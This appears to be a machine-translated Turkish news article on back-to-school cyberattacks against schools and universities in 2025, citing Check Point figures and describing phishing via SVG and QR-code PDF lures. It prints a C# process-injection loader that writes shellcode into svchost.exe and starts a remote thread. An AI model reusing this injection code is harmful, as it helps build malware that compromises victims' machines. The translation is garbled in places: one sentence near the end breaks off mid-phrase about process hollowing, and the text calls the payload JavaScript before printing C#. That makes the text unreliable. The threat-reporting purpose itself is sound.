Öğrenciler ve personel bu Ağustos ayında kampüslere döndükçe, dünya çapında eğitim kurumlarına yönelik siber saldırılarda keskin bir artış gözlendi.
Ocak-Temmuz 2025 yılları arasında, eğitim sektöründeki kuruluşlar haftalık ortalama 4.356 saldırıya katlanarak yıllık yüzde 41’lik bir artış gösterdi. Bu saldırılar, kimlik bilgisi-hasat kimlik avı alanlarından, ağlardan ödün vermeyi ve hassas verileri püskürtmeyi amaçlayan kötü amaçlı kodun sofistike olarak sunulmasına kadar uzanmaktadır.
Okula dönüş acelesine zamanlanan temalı kimlik avı kampanyalarının ortaya çıkması, bu tehditlerin hem hacmini hem de karmaşıklığını artırarak son kullanıcı aciliyetini ve dijital platformlara güvenmektedir.
Saldırılar tüm bölgelerde eşit bir şekilde vuruldu, ancak Asya-Pasifik örgütleri en ağır saldırılarla karşılaştı ve organizasyon başına ortalama 7.869 saldırı.
Kuzey Amerika en dik artışı gördü, yüzde 67 artış, Avrupa ve Afrika sırasıyla yüzde 48 ve yüzde 56 artış kaydetti.
Ülke düzeyinde İtalya, organizasyon başına 8.593 saldırı, ardından Hong Kong 5.399’da, Portekiz 5.488’de ve 2.912’de ABD’de liderlik etti.
Check Point analistleri, bu dalgalanmaların ölçeğinin ve zamanlamasının saldırganların, etkiyi en üst düzeye çıkarmak ve tespitten kaçınmak için dijital aktivitedeki mevsimsel artıştan yararlandığını gösterdiğini belirtti.
Saldırganların ötesinde, saldırganlar tekniklerini geliştirdiler. Sadece Temmuz ayında, akademik kurumları taklit eden 18.000’den fazla yeni alan kaydedildi ve her 57 kişiden biri kötü niyetli veya şüpheli olarak işaretlendi.
Bu alanlar genellikle Microsoft’un giriş arayüzlerini taklit eden taklit sayfalarına barındırır. Check Point araştırmacıları, kötü amaçlı yazılım yüklerinin görünüşte iyi huylu SVG ekleri veya QR kodlu PDF formları aracılığıyla teslim edildiği, kimlik bilgisi hırsızlığı ve ikincil yükleyicilerin dağıtımını sağlayan birden fazla kampanya belirlediler.
Enfeksiyon mekanizması
Kötü amaçlı yazılımların enfeksiyon zincirine daha derin bir bakış, kalıcılık ve kaçırma için tasarlanmış çok aşamalı bir süreci ortaya çıkarır.
İlk uzlaşma, hazırlanmış bir SVG dosyası veya üniversite iletişimi olarak gizlenmiş bir PDF içeren bir kimlik avı e -postasıyla başlar.
Açıldığında, SVG yazım hatası bir alandan bir yük getiren gömülü bir JavaScript çağırır.
// Simplified loader injection snippet
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
class Injector {
[DllImport("kernel32.dll")] static extern IntPtr OpenProcess(int a, bool b, int c);
[DllImport("kernel32.dll")] static extern bool WriteProcessMemory(IntPtr h, IntPtr addr, byte[] data, int size, out IntPtr written);
[DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr h, IntPtr lp, uint sz, IntPtr start, IntPtr arg, uint flags, out IntPtr id);
static void Main(string[] args) {
Process target = Process.Start("svchost.exe");
IntPtr h = OpenProcess(0x1F0FFF, false, target.Id);
byte[] shellcode = Convert.FromBase64String("..."); // encrypted payload
WriteProcessMemory(h, target.MainModule.BaseAddress, shellcode, shellcode.Length, out _);
CreateRemoteThread(h, IntPtr.Zero, 0, target.MainModule.BaseAddress, IntPtr.Zero, 0, out _);
}
}Yük, bellekte şifresini çözen ve hafif bir kötü amaçlı yazılım yükleyicisini kalıcılık için Windows başlangıç klasörüne bırakan bir .NET yürütülebilir dosyasıdır.
| Metrik | Değer |
|---|---|
| Ortalama haftalık saldırılar (Global) | 4.356 |
| Yıllık artış | Yüzde +41 |
| APAC ortalama haftalık saldırılar | 7.869 |
| Kuzey Amerika Yoy Artış | Yüzde +67 |
| Avrupa Yoy Artış | Yüzde +48 |
| Afrika Yoy Artış | Yüzde +56 |
| Organizasyon başına İtalya saldırıları | 8.593 |
| Amerika Birleşik Devletleri Organizasyon Başına Saldırılar | 2.912 |
| Kötü niyetli akademik temalı alanlar (Temmuz) | 57’de 1 |
Tespit kaçakçılığı işlemi kullanılarak elde edilir.[.]exe), belleğini kapatır ve kötü amaçlı kodları oyuk örneğe enjekte eder.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.